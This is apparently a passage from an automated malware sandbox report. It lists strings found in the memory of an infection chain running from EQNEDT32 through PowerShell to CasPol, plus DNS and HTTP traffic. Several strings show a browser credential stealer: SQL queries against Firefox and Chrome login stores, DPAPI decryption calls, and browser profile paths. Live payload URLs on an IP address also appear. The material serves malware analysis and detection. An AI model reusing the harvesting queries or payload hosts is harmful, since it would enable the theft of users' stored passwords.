(Facebook)
                  Source: CasPol.exe, 00000016.00000002.531793309.0000000001D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login102 FROM nssPrivatekey3.dbkey4.dbSELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from loginsLocal Stateos_cryptencrypted_keyDPAPICredReadACredFreeCredDeleteACredEnumerateACredEnumerateWSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2pstorec.dllPStoreCreateInstancehostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmtimeCreatedtimeLastUsedtimePasswordChangedtimesUsedSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_loginssignons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsoncrypt32.dllCryptUnprotectDataadvapi32.dllCryptAcquireContextCryptReleaseContextCryptCreateHashCryptGetHashParamCryptHashDataCryptDestroyHashCryptDecryptCryptDeriveKeyCryptImportKeyCryptDestroyKeyinternet explorerwininetcachecredentialsdpapi:"Account","Login Name","Password","Web Site","Comments"name,url,username,passwordWeb DataLogin Datafirefox.exeData\ProfileYandex\YandexBrowser\User Data\Default\Login DataVivaldi\User Data\Default\Login DataMicrosoftEdge*User DataGoogle\Chrome\User DataGoogle\Chrome SxS\User DataChromium\User DataLogin DataOpera\Opera\wand.datOpera\Opera7\profile\wand.datOperawand.datOpera Software\Opera Stable\Login Dataabe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInetMicrosoft_WinInet_ ShowGridLinesSaveFilterIndexShowInfoTipMarkOddEvenRowsShowTimeInGMTLoadPasswordsIELoadPasswordsFirefoxLoadPasswordsChromeLoadPasswordsOperaLoadPasswordsSafariLoadPasswordsSeaMonkeyLoadPasswordsYandexLoadPasswordsVivaldiLoadPasswordsWaterfoxUseFirefoxProfileFolderUseFirefoxInstallFolder equals www.yahoo.com (Yahoo)
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: u4u.kids
                  Source: global trafficDNS traffic detected: DNS query: drive.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: servemail.exprotedsteel.pro
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:26:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:26:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                  Source: powershell.exe, 0000000B.00000002.455991013.000000000263A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.454994570.0000000000398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/igetbestthingswithbestpicturewithgreatthingsonme.tIF
                  Source: EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta
                  Source: EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta:
                  Source: EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.htaj
                  Source: wg on 85.215.206.82.url.0.drString found in binary or memory: http://85.215.206.82/270/weg/wg/
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: CasPol.exe, CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpE
                  Source: CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
                  Source: powershell.exe, 0000000B.00000002.455991013.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 0000000B.00000002.455991013.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.589694416.0000000002528000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.515289278.0000000002501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
